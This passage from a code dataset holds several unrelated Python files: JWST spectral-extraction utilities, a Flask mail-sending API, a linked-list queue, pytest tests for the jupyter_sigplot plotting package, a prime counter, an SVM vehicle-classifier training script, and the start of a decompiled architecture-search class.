flat.flatfield(raw_data_counts, total_flat)\n var_poisson, _ = flat.flatfield(raw_var_poisson, total_flat**2)\n base_var, _ = flat.flatfield(raw_var_rnoise, total_flat**2)\n var, _ = flat.flatfield(raw_var, total_flat**2)\n sciivar = inverse(var)\n\n # TODO Currently the var_flat is nonsense I think and so I'm just going to use the var_poisson and var_rnoise to get\n # the noise. If this gets fixed use the line below which includes the var_flat.\n # err = kludge_err*np.array(slit.err.T, dtype=float)*flux_to_counts\n #var_poisson = slit.var_poisson.T * flux_to_counts ** 2\n #var_rnoise = slit.var_rnoise.T * flux_to_counts ** 2\n #var = kludge_err**2*np.array(var_poisson + var_rnoise, dtype=float)\n # This needs to be multiplied by count_scale to get it into units of counts which is what pypeit requires. I checked\n # that this base_var is equal to e2d.var_rnoise if you remove the flux_to_counts factor.\n # base_var = np.array(final2d.slits[islit].var_rnoise.T, dtype=float)*flux_to_counts**2*count_scale**2\n #base_var = np.array(slit.var_rnoise.T, dtype=float) * flux_to_counts ** 2\n\n # TODO I'm unsure about these\n dq = np.array(final_slit.dq.T, dtype=int)\n waveimg = np.array(final_slit.wavelength.T, dtype=float)\n\n gpm = np.logical_not(dq & DO_NOT_USE)\n\n finite_mask = np.isfinite(science)\n nanmask = np.logical_not(finite_mask)\n science[nanmask] = 0.0\n # err[nanmask] = 0.0\n var[nanmask] = 0.0\n sciivar = inverse(var) * gpm\n base_var[nanmask] = 0.0\n count_scale[nanmask] = 0.0\n # Wave nanmask is different from data nanmask\n slit_wcs = final_slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n ra = calra.T\n nanmask_wave = np.logical_not(np.isfinite(waveimg))\n wave_min = np.min(waveimg[np.logical_not(nanmask_wave)])\n wave_max = np.max(waveimg[np.logical_not(nanmask_wave)])\n nanmask_ra = np.logical_not(np.isfinite(ra))\n ra_min = np.min(ra[np.logical_not(nanmask_ra)])\n ra_max = np.max(ra[np.logical_not(nanmask_ra)])\n waveimg[nanmask_wave] = 0.0\n ra[nanmask_ra] = 0.0\n\n\n # TODO Figure out a way to get the slit boundaries from the WCS itself instead of this kludge with the nan values\n slit_left, slit_righ = jwst_get_slits(finite_mask)\n # Generate some tilts and a spatial image\n tilts = np.zeros_like(waveimg)\n tilts[np.isfinite(waveimg)] = (waveimg[np.isfinite(waveimg)] - wave_min) / (wave_max - wave_min)\n\n # TODO Fix this spat_pix to make it increasing with pixel. For now don't use it\n nspec, nspat = science.shape\n spat_pix = (ra - ra_min) / (ra_max - ra_min) * (nspat - 1)\n spat_pix[nanmask_ra] = 0.0\n\n\n return science, sciivar, gpm, base_var, count_scale, tilts, waveimg, finite_mask, slit_left, slit_righ, t_eff\n\n\n\n\ndef jwst_extract_subimgs_old(e2d_slit, final_slit, intflat_slit):\n\n # The various multiplicative calibrations we need.\n slit_name = final_slit.name\n waveimg = np.array(final_slit.wavelength.T, dtype=float)\n slit_wcs = final_slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n ra = calra.T\n dec = caldec.T\n\n # get the source RA and Dec coordinates from the metadata (also located in the header of the fits SCI extension)\n nspec, nspat = ra.shape\n src_ra, src_dec= final_slit.meta.target.ra, final_slit.meta.target.dec\n\n cal_spat = np.arange(nspat) # spatial position\n src_trace_ra = np.zeros(nspec) # Array to hold the source_RA as a function of spectral position\n src_trace_dec = np.zeros(nspec) # Array to hold the source_DEC as a function of spectral position\n for ispec in range(nspec):\n ra_vs_spat = calra[:, ispec] #\n # Interpolate y-pixel as a functio of RA onto the source RA\n src_trace_ra[ispec] = np.interp(src_ra, ra_vs_spat[np.isfinite(ra_vs_spat)],\n cal_spat[np.isfinite(ra_vs_spat)])\n dec_vs_spat = caldec[:, ispec]\n src_trace_dec[ispec] = np.interp(src_dec, dec_vs_spat[np.isfinite(dec_vs_spat)], cal_spat[np.isfinite(dec_vs_spat)])\n\n\n waveimg_from_wcs = calwave.T\n # Sometimes this fails at the 1e-4 level and disagreess about nans???\n #assert np.allclose(waveimg, waveimg_from_wcs, rtol=1e-3, atol=1e-3, equal_nan=True)\n\n\n flatfield = np.array(intflat_slit.data.T, dtype=float) #if intflat_slit is not None else np.ones_like(pathloss)\n pathloss = np.array(final_slit.pathloss_uniform.T, dtype=float) if final_slit.source_type == 'EXTENDED' else \\\n np.array(final_slit.pathloss_point.T, dtype=float)\n if pathloss.shape == (0,0):\n msgs.warn('No pathloss for slit {0}'.format(slit_name) + ', setting to 1.0')\n pathloss = np.ones_like(flatfield)\n\n barshadow = np.array(final_slit.barshadow.T, dtype=float)\n if barshadow.shape == (0,0):\n msgs.warn('No barshadow for slit {0}'.format(slit_name) + ', setting to 1.0')\n barshadow = np.ones_like(flatfield)\n\n photom_conversion = final_slit.meta.photometry.conversion_megajanskys\n final = np.array(final_slit.data.T, dtype=float)\n rate = np.array(e2d_slit.data.T, dtype=float)\n rate_var_rnoise = np.array(e2d_slit.var_rnoise.T, dtype=float)\n rate_var_poisson = np.array(e2d_slit.var_poisson.T, dtype=float)\n # This is currently buggy as it includes flat field error\n rate_var_tot = np.square(np.array(e2d_slit.err.T, dtype=float))\n dq = np.array(final_slit.dq.T, dtype=int)\n\n\n # Generate some tilts and a spatial image\n finitemask = np.isfinite(waveimg)\n wave_min, wave_max = np.min(waveimg[finitemask]), np.max(waveimg[finitemask])\n\n tilts = np.zeros_like(waveimg)\n tilts[finitemask] = (waveimg[finitemask] - wave_min) / (wave_max - wave_min)\n\n # TODO Fix this spat_pix to make it increasing with pixel. For now don't use it\n # This currnetly depends on poisition angle which I need to hack to fix\n # ra_min, ra_max = np.min(ra_sub[finitemask_sub]), np.max(ra_sub[finitemask_sub])\n # spat_pix_sub = np.zeros_like(ra_sub)\n # spat_pix_sub[finitemask_sub] = spat_lo + (ra[finitemask_sub] - ra_min) / (ra_max - ra_min) * (nspat_sub - 1)\n\n # Get slit bounadries\n slit_left, slit_righ = jwst_get_slits(finitemask)\n\n ########################\n # The image segment being used for each slit\n spec_lo = final_slit.xstart - 1\n spec_hi = spec_lo + final_slit.xsize\n spat_lo = final_slit.ystart - 1\n spat_hi = spat_lo + final_slit.ysize\n # slice object for the segment\n slit_slice = np.s_[spec_lo: spec_hi, spat_lo: spat_hi]\n\n slit_left_orig = spat_lo + slit_left\n slit_righ_orig = spat_lo + slit_righ\n spec_vals_orig = spec_lo + np.arange(spec_hi - spec_lo)\n\n\n return slit_left, slit_righ, slit_left_orig, slit_righ_orig, spec_vals_orig, src_trace_ra, src_trace_dec, \\\n rate, rate_var_rnoise, rate_var_poisson, rate_var_tot, dq, \\\n ra, dec, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, final\n\n","sub_path":"dev_algorithms/jwst/jwst_utils.py","file_name":"jwst_utils.py","file_ext":"py","file_size_in_byte":37661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"513483641","text":"from flask import render_template, request, make_response, jsonify, redirect\nfrom markupsafe import Markup, escape\nimport config\nfrom mail.flask_mail import flask_plain_email, flask_template_email, mail\nfrom flask_mail import Message\nfrom config import mail\n\n\n# Get the application instance\nconnex_app = config.connex_app\n\n# Read the swagger.yml file to configure the endpoints\nconnex_app.add_api(\"swagger.yml\")\n\n\n@connex_app.route('/')\ndef documentation():\n return redirect('/v1/ui')\n\n@connex_app.route('/v1/documentation')\ndef json_documentation():\n return redirect('/v1/swagger.json')\n\n\n@connex_app.route('/v1/configure')\ndef key_value_json():\n return redirect('/v1/ui')\n\n@connex_app.route('/v1/sendmail/interface')\ndef home():\n return render_template('home.html')\n\n@connex_app.route('/v1/sendmail/demo')\ndef send_email():\n return render_template('create.html')\n\n\n@connex_app.route('/sendmail/html', methods=['POST'])\ndef sendmail_html():\n if request.method == 'POST':\n subject = Markup.escape(request.form['subject'])\n message = ''+ request.form['message'] +''\n recipients = request.form['recipients']\n mail_list = recipients.split(',')\n len_list = len(mail_list) - 1\n if recipients != '' or message != '' or subject != '':\n with mail.connect() as conn:\n while len_list > -1:\n msg = Message(recipients=[mail_list[len_list]], html=message, subject=subject)\n \n try:\n conn.send(msg)\n response = {\n 'status': 'success',\n 'data':{\n 'message': 'Mail sent successfully'\n }\n }\n status = 200\n except Exception:\n response = {\n 'status': 'error',\n 'data':{\n 'message': 'Error: Mail was not sent.'\n }\n }\n status = 500\n len_list -= 1\n return make_response(jsonify(response), status)\n\n\n@connex_app.route('/sendmail/text', methods=['POST'])\ndef sendmail_text():\n if request.method == 'POST':\n subject = Markup.escape(request.form['subject'])\n message = Markup.escape(request.form['message'])\n recipients = request.form['recipients']\n mail_list = recipients.split(',')\n len_list = len(mail_list) - 1\n if recipients != '' or message != '' or subject != '':\n with mail.connect() as conn:\n while len_list > -1:\n msg = Message(recipients=[mail_list[len_list]], body=message, subject=subject)\n \n try:\n conn.send(msg)\n response = {\n 'status': 'success',\n 'data':{\n 'message': 'Mail sent successfully'\n }\n }\n status = 200\n except Exception:\n response = {\n 'status': 'error',\n 'data':{\n 'message': 'Error: Mail was not sent.'\n }\n }\n status = 500\n len_list -= 1\n return make_response(jsonify(response), status)\n \n \n\nif __name__ == '__main__':\n connex_app.run(host='127.0.0.1', port=3000, debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599783274","text":"class ListNode:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.size = 0\r\n\r\n# 印出list中的所有資料\r\n def PrintList(self): \r\n arr = self.head\r\n while arr != None:\r\n print(arr.value, end=' ')\r\n arr = arr.next\r\n print()\r\n\r\n# dequeue:取出佇列前端之資料\r\n def dequeue(self): \r\n pop = self.head\r\n if pop == None:\r\n print(\"List is empty.\")\r\n else:\r\n self.head = pop.next\r\n pop = None\r\n self.size -= 1\r\n# enqueue:將資料放入佇列尾端\r\n def enqueue(self, data): \r\n NewNode = ListNode(data)\r\n if self.head == None:\r\n self.head = NewNode\r\n else:\r\n push = self.head\r\n while(push.next != None):\r\n push = push.next\r\n push.next = ListNode(data)\r\n self.size += 1\r\n\r\nif __name__ == '__main__': # 檔案被import時,不執行main()函式\r\n\r\n list = LinkedList()\r\n list.enqueue(2)\r\n list.enqueue(4)\r\n list.enqueue(6)\r\n list.PrintList()\r\n list.dequeue()\r\n list.PrintList()\r\n list.enqueue(19)\r\n list.PrintList()\r\n list.dequeue()\r\n list.PrintList()","sub_path":"queue/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"392828847","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport pytest\nfrom mock import patch\nimport numpy as np\nfrom IPython.testing.globalipapp import get_ipython\n\nip = get_ipython()\n\nfrom jupyter_sigplot.sigplot import SigPlot # noqa: E402\nfrom testutil import EnvironmentVariable # noqa: E402\n\n\ndef test_empty_object():\n plot = SigPlot()\n assert plot.inputs == []\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == {}\n\n\ndef test_non_empty_object():\n plot = SigPlot(\"foo.tmp\")\n assert plot.inputs == [\"foo.tmp\"]\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == {}\n\n\ndef test_change_settings():\n options = {'noyaxis': True, 'noxaxis': True}\n plot = SigPlot(\"foo.tmp\", options=options)\n assert plot.inputs == [\"foo.tmp\"]\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == options\n\n new_options = {'noyaxis': False, 'xi': True}\n plot.change_settings(**new_options)\n assert plot.inputs == [\"foo.tmp\"]\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == {'noyaxis': False, 'noxaxis': True, 'xi': True}\n\n\ndef test_show_1d_array():\n plot = SigPlot()\n assert plot.arrays == []\n assert plot.array_obj == {}\n\n data = [1, 2, 3]\n layer_type = '1D'\n plot.show_array(data, layer_type=layer_type)\n\n array_obj = {\n \"data\": data,\n \"overrides\": {},\n \"layerType\": layer_type,\n }\n assert plot.array_obj == array_obj\n assert plot.arrays == [array_obj]\n\n\ndef test_subsize_show_2d_array():\n plot = SigPlot()\n assert plot.arrays == []\n assert plot.array_obj == {}\n\n data = [[1, 2, 3], [3, 4, 5]]\n layer_type = '2D'\n subsize = len(data[0])\n plot.show_array(data, layer_type=layer_type, subsize=subsize)\n\n array_obj = {\n \"data\": data,\n \"overrides\": {\n \"subsize\": subsize\n },\n \"layerType\": layer_type,\n }\n assert plot.array_obj == array_obj\n assert plot.arrays == [array_obj]\n\n\ndef test_no_subsize_show_2d_array():\n plot = SigPlot()\n data = [[1, 2, 3], [3, 4, 5]]\n with pytest.raises(ValueError):\n plot.show_array(data, layer_type='2D', subsize=None)\n\n\ndef test_overlay_array_bad_type():\n plot = SigPlot()\n assert plot.inputs == []\n\n data = 3\n with pytest.raises(TypeError):\n plot.overlay_array(data)\n\n\ndef test_overlay_array_empty():\n plot = SigPlot()\n assert plot.inputs == []\n\n data = []\n plot.overlay_array(data)\n assert plot.inputs == [data]\n\n\ndef test_overlay_array_non_empty():\n plot = SigPlot()\n assert plot.inputs == []\n\n data = [1, 2, 3]\n plot.overlay_array(data)\n assert plot.inputs == [data]\n\n\ndef test_show_href_url():\n plot = SigPlot()\n assert plot.href_obj == {}\n assert plot.hrefs == []\n\n path = \"http://sigplot.lgsinnovations.com/dat/sin.tmp\"\n layer_type = \"1D\"\n plot.show_href(path, layer_type)\n\n href_obj = {\n \"filename\": \"sin.tmp\",\n \"layerType\": layer_type,\n }\n assert plot.href_obj == href_obj\n assert plot.hrefs == [href_obj]\n assert plot.oldHrefs == [href_obj]\n\n assert os.path.exists(\"./sin.tmp\")\n os.remove(\"./sin.tmp\")\n\n\ndef test_show_href_file_absolute_already_in_cwd():\n plot = SigPlot()\n\n assert plot.inputs == []\n\n path = os.path.join(os.getcwd(), \"sin.tmp\")\n plot.show_href(path, '1D')\n\n href_obj = {\n \"filename\": 'sin.tmp',\n \"layerType\": '1D',\n }\n assert plot.href_obj == href_obj\n assert plot.hrefs == [href_obj]\n assert plot.oldHrefs == [href_obj]\n\n\n@patch('os.mkdir')\n@patch('os.symlink')\ndef test_show_href_file_absolute_not_already_there(symlink_mock, mkdir_mock):\n path = \"~/foo.tmp\"\n plot = SigPlot()\n\n plot.show_href(path, '1D')\n assert mkdir_mock.call_count == 1\n assert mkdir_mock.call_args[0][0] == '.'\n\n assert symlink_mock.call_count == 1\n\n local_path = 'foo.tmp'\n fpath = os.path.expanduser(os.path.expandvars(path))\n assert symlink_mock.call_args[0] == (fpath, local_path)\n\n\n@patch('os.mkdir')\n@patch('os.symlink')\ndef test_show_href_file_relative(symlink_mock, mkdir_mock):\n path = \"../foo.tmp\"\n plot = SigPlot()\n\n plot.show_href(path, '1D')\n assert mkdir_mock.call_count == 1\n assert mkdir_mock.call_args[0][0] == '.'\n\n assert symlink_mock.call_count == 1\n\n local_path = 'foo.tmp'\n fpath = os.path.expanduser(os.path.expandvars(path))\n assert symlink_mock.call_args[0] == (fpath, local_path)\n\n\ndef test_overlay_href_non_empty_file():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = \"foo.tmp\"\n plot.overlay_href(path)\n assert plot.inputs == [path]\n\n\ndef test_overlay_href_non_empty_http():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = \"http://sigplot.lgsinnovations.com/dat/sin.tmp\"\n plot.overlay_href(path)\n\n assert os.path.exists(\"./sin.tmp\")\n assert plot.inputs == [\"sin.tmp\"]\n\n os.remove(\"./sin.tmp\")\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot._show_href_internal')\ndef test_plot_one_href(show_href_mock):\n href = \"foo.tmp\"\n plot = SigPlot(href)\n assert plot.inputs == [href]\n\n plot.plot()\n assert show_href_mock.call_count == 1\n assert show_href_mock.call_args[0] == ({\n \"filename\": href,\n \"layerType\": \"1D\"},)\n assert show_href_mock.call_args[1] == {}\n assert plot.done\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot._show_href_internal')\ndef test_plot_two_href(show_href_mock):\n href1 = \"foo.tmp\"\n href2 = \"sin.tmp\"\n href = \"|\".join((href1, href2))\n plot = SigPlot(href)\n assert plot.inputs == [href1, href2]\n\n plot.plot()\n assert show_href_mock.call_count == 2\n args1, kwargs1 = show_href_mock.call_args_list[0]\n assert args1 == ({\"filename\": href1, \"layerType\": \"1D\"},)\n assert kwargs1 == {}\n\n args2, kwargs2 = show_href_mock.call_args_list[1]\n assert args2 == ({\"filename\": href2, \"layerType\": \"1D\"},)\n assert kwargs2 == {}\n assert plot.done\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot._show_href_internal')\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_mixed(show_array_mock, show_href_mock):\n href = \"foo.tmp\"\n arr = [1, 2, 3, 4]\n\n plot = SigPlot(href, arr)\n assert plot.inputs == [href, arr]\n\n plot.plot()\n assert show_href_mock.call_count == 1\n assert show_array_mock.call_count == 1\n\n assert show_href_mock.call_args[0] == ({\"filename\": href,\n \"layerType\": \"1D\",\n },)\n\n assert show_array_mock.call_args[0] == (arr, )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"1D\",\n \"subsize\": None\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_1d(show_array_mock):\n arr = np.array([1, 2, 3, 4])\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n plot.plot()\n assert show_array_mock.call_count == 1\n print(show_array_mock.call_args)\n assert show_array_mock.call_args[0] == (arr.tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"1D\",\n \"subsize\": None\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_2d_no_subsize(show_array_mock):\n arr = [[1, 2, 3, 4], [5, 6, 7, 8]]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n plot.plot(layer_type=\"2D\")\n assert show_array_mock.call_count == 1\n assert show_array_mock.call_args[0] == (np.array(arr).flatten().tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"2D\",\n \"subsize\": len(arr[0])\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_2d_with_subsize(show_array_mock):\n arr = [[1, 2, 3, 4], [5, 6, 7, 8]]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n subsize = len(arr[0])\n plot.plot(layer_type=\"2D\", subsize=subsize)\n assert show_array_mock.call_count == 1\n assert show_array_mock.call_args[0] == (np.array(arr).flatten().tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"2D\",\n \"subsize\": subsize\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_3d(show_array_mock):\n arr = [[[1], [2], [3], [4]], [[5], [6], [7], [8]]]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n subsize = len(arr[0])\n with pytest.raises(ValueError):\n plot.plot(layer_type=\"2D\", subsize=subsize)\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_expected_2d(show_array_mock):\n arr = [1, 2, 3, 4]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n with pytest.raises(ValueError):\n plot.plot(layer_type=\"2D\")\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_expected_2d_with_subsize(show_array_mock):\n arr = [1, 2, 3, 4]\n\n subsize = 2\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n plot.plot(layer_type=\"2D\", subsize=subsize)\n assert show_array_mock.call_count == 1\n assert show_array_mock.call_args[0] == (np.array(arr).flatten().tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"2D\",\n \"subsize\": subsize\n }\n\n\ndef test_overlay_file_non_empty():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = \"foo.tmp\"\n plot.overlay_file(path)\n assert plot.inputs == [path]\n\n\ndef test_overlay_file_bad_type():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = 3\n with pytest.raises(TypeError):\n plot.overlay_file(path)\n\n\ndef test_unravel_path():\n import time\n from jupyter_sigplot.sigplot import _unravel_path\n\n cwd_full = os.getcwd()\n tilde_full = os.path.expanduser('~')\n\n # Go all the way through the environment instead of a mock to be sure the\n # whole thing works end to end\n with EnvironmentVariable('TEST_UNRAVEL', str(time.time())) as envvar:\n env_key = envvar.key\n env_val = envvar.new_value\n\n cases = [\n # input # expected output\n ('', cwd_full),\n ('.', cwd_full),\n ('./nonesuch/..', cwd_full),\n\n ('~', tilde_full),\n\n # Leading / because bare words are unraveled relative to cwd\n ('/$%s' % env_key, os.path.join('/', env_val)),\n\n ('~/$%s' % env_key, os.path.join(tilde_full, env_val)),\n\n ('/', '/'),\n ('/../', '/'),\n ]\n\n platform_specific_cases = [\n ('/tmp', '/tmp'),\n ('/tmp/foo/..', '/tmp'),\n ]\n\n for (input, expected) in platform_specific_cases:\n # macOS-compatibility\n if sys.platform.startswith('darwin'):\n cases.append((input, \"/private\" + expected))\n else:\n cases.append((input, expected))\n\n for (input, expected) in cases:\n actual = _unravel_path(input)\n assert(actual == expected)\n\n\n@patch('os.mkdir')\ndef test_require_dir_good_inputs(mkdir_mock):\n from jupyter_sigplot.sigplot import _require_dir\n\n inputs = (\n '.',\n 'data',\n )\n\n for d in inputs:\n _require_dir(d)\n args, kwargs = mkdir_mock.call_args\n assert args[0] == d\n\n assert mkdir_mock.call_count == len(inputs)\n\n # Special case: '' means '.'\n _require_dir('')\n assert mkdir_mock.call_args[0][0] == '.'\n\n\ndef test_local_name_for_href_good_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_href\n\n cases = [\n # input # expected output\n ('http://www.example.com/foo.tmp', 'foo.tmp'),\n ('http://www.example.com/dat/foo.tmp', 'foo.tmp'),\n ('https://localhost/foo.tmp', 'foo.tmp'),\n ('https://localhost/dat/foo.tmp', 'foo.tmp'),\n ]\n local_dirs = ['.', 'data', 'files/data', '/path/to/data', ]\n\n for ld in local_dirs:\n for (input, expected) in cases:\n actual = _local_name_for_href(input, ld)\n expected = os.path.join(ld, expected)\n assert(actual == expected)\n\n\ndef test_local_name_for_href_bad_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_href\n cases = [\n # url local_dir exception\n ('http://localhost/foo.tmp', None, TypeError),\n (None, '.', TypeError),\n ('', '.', ValueError),\n ]\n for url, local_dir, etype in cases:\n with pytest.raises(etype):\n _local_name_for_href(url, local_dir)\n\n # TODO (sat 2018-11-19): Decide whether we want _local_name_for_href to\n # validate URLs more strictly; if so, add tests here.\n\n\ndef test_local_name_for_file_local_good_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_file\n cases = [\n # input # expected output\n ('foo.tmp', 'foo.tmp'),\n ('dat/foo.tmp', 'dat/foo.tmp'),\n ]\n local_dirs = ['.', 'data', 'files/data', '/path/to/data', ]\n\n # None of these should require symlinks\n for ld in local_dirs:\n for (input, expected) in cases:\n # This test could definitely be stronger. The current idea is just\n # to ensure that some basic cases work right.\n input = os.path.join(ld, input)\n\n actual, is_local = _local_name_for_file(input, ld)\n assert is_local\n expected = os.path.join(ld, expected)\n assert(actual == expected)\n\n\ndef test_local_name_for_file_nonlocal_good_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_file\n cases = [\n # input # expected output\n ('/data/foo.tmp', 'foo.tmp'),\n ('../dat/foo.tmp', 'foo.tmp'),\n ('../foo.tmp', 'foo.tmp'),\n ('data/../../foo.tmp', 'foo.tmp'),\n ]\n local_dirs = ['.', 'data', 'files/data', '/path/to/data', ]\n\n # All these should require symlinks\n for ld in local_dirs:\n for (input, expected) in cases:\n actual, is_local = _local_name_for_file(input, ld)\n assert not is_local\n expected = os.path.join(ld, expected)\n assert(actual == expected)\n\n\ndef test_local_name_for_file_bad_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_file\n cases = [\n # fpath local_dir exception\n ('foo.tmp', None, TypeError),\n (None, '.', TypeError),\n ('', '.', ValueError),\n ]\n for fpath, local_dir, etype in cases:\n with pytest.raises(etype):\n _local_name_for_file(fpath, local_dir)\n\n\ndef test_split_inputs():\n from jupyter_sigplot.sigplot import _split_inputs\n cases = [\n # input # expected output\n ('', []),\n ('a', ['a']),\n ('a|b', ['a', 'b']),\n\n ('file.tmp', ['file.tmp']),\n ('file.tmp|http://url/', ['file.tmp', 'http://url/']),\n\n (' a ', ['a']),\n (' a | b ', ['a', 'b']),\n\n ('|', []),\n ('||', []),\n ('a|', ['a']),\n ('|a', ['a']),\n ('||a|||', ['a']),\n ('||a|||b|', ['a', 'b']),\n (' | || | ', []),\n ]\n for (input, expected) in cases:\n actual = _split_inputs(input)\n assert(actual == expected)\n\n\n@patch('jupyter_sigplot.sigplot._prepare_file_input')\n@patch('jupyter_sigplot.sigplot._prepare_http_input')\ndef test_prepare_href_input(prepare_http_input_mock,\n prepare_file_input_mock):\n from jupyter_sigplot.sigplot import _prepare_href_input\n\n # The value is unimportant for this test\n local_dir = None\n\n def reset():\n for m in (prepare_file_input_mock,\n prepare_http_input_mock,\n ):\n m.reset_mock()\n\n # empty input\n _prepare_href_input('', local_dir)\n prepare_http_input_mock.assert_not_called()\n prepare_file_input_mock.assert_not_called()\n\n # file only\n reset()\n _prepare_href_input('foo.tmp', local_dir)\n prepare_http_input_mock.assert_not_called()\n prepare_file_input_mock.assert_called_once_with('foo.tmp', local_dir)\n\n # url only\n reset()\n _prepare_href_input('https://www.example.com/bar.tmp', local_dir)\n prepare_http_input_mock.assert_called_once_with(\n 'https://www.example.com/bar.tmp',\n local_dir)\n prepare_file_input_mock.assert_not_called()\n\n # file and url\n reset()\n _prepare_href_input('foo.tmp|https://www.example.com/bar.tmp', local_dir)\n prepare_http_input_mock.assert_called_once_with(\n 'https://www.example.com/bar.tmp',\n local_dir)\n prepare_file_input_mock.assert_called_once_with('foo.tmp', local_dir)\n\n # order independence\n reset()\n _prepare_href_input('https://www.example.com/bar.tmp|foo.tmp', local_dir)\n prepare_http_input_mock.assert_called_once_with(\n 'https://www.example.com/bar.tmp',\n local_dir)\n prepare_file_input_mock.assert_called_once_with('foo.tmp', local_dir)\n\n # multiple of each\n reset()\n _prepare_href_input(\n 'https://www.example.com/bar.tmp| foo.tmp|baz.tmp|http://www.example.com/quux.tmp | xyzzy.prm', # noqa: E501\n local_dir)\n assert prepare_http_input_mock.call_count == 2\n assert prepare_file_input_mock.call_count == 3\n","sub_path":"test/test_jupyter_sigplot.py","file_name":"test_jupyter_sigplot.py","file_ext":"py","file_size_in_byte":17764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"357944413","text":"x=input().split(\" \")\nx=[int(i) for i in x]\ncount=0\nfor i in range(x[0],x[1]+1):\n flag=1\n for j in range(2,i):\n if(i%j==0):\n flag=0\n break\n if(flag):\n count+=1\nprint(count)\n","sub_path":"s9.py","file_name":"s9.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"352225032","text":"import cv2\nimport numpy as np\nimport glob\nimport os\nimport pickle\n\n\nfrom util.ExtractFeatures import ExtractFeatures\nfrom util.SvmClassifier import SvmClassifier\n\n# Divide up into cars and notcars\nimages = glob.glob('test_images/vehicles_smallset/*/*.jpeg', recursive=True)\ncars = []\nnotcars = []\n\nfor image in images:\n if 'image' in image.split(\"\\\\\")[-1] or 'extra' in image.split(\"\\\\\")[-1]:\n notcars.append(image)\n else:\n cars.append(image)\n\n# Feature extraction\nextractFeatures = ExtractFeatures()\ncar_features = extractFeatures.extract_features_from_paths(cars)\nnot_car_features = extractFeatures.extract_features_from_paths(notcars)\n\n#X = np.vstack((car_features, not_car_features)).astype(np.float64)\nX = np.vstack((car_features, not_car_features)).astype(np.float64)\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(not_car_features))))\n\n# train classifier \nsvm = SvmClassifier()\nsvm.train(X,y)\n\nresult = svm.predict(X)\n\n# save classifier \n\nextracted_features_and_svm = {\"svm\":svm, \"extractFeatures\":extractFeatures}\n\nwith open('extracted_features_and_svm.pk', 'wb') as pickle_file:\n pickle.dump(extracted_features_and_svm, pickle_file)","sub_path":"train_svm.py","file_name":"train_svm.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"390250899","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/romainegele/Documents/Argonne/deephyper/build/lib/deephyper/search/nas/model/space/op/connect.py\n# Compiled at: 2019-07-11 14:24:06\n# Size of source mod 2**32: 1141 bytes\nfrom deephyper.search.nas.model.space.op import Operation\n\nclass Connect(Operation):\n __doc__ = 'Connection node.\\n\\n Represents a possibility to create a connection between n1 -> n2.\\n\\n Args:\\n graph (nx.DiGraph): a graph\\n n1 (Node): starting node\\n n2 (Node): arrival node\\n '\n\n def __init__(self, struct, n1, n2, *args, **kwargs):\n self.struct = struct\n self.n1 = n1\n self.n2 = n2\n\n def __str__(self):\n if type(self.n1) is list:\n if len(self.n1) > 0:\n ids = str(self.n1[0].id)\n for n in 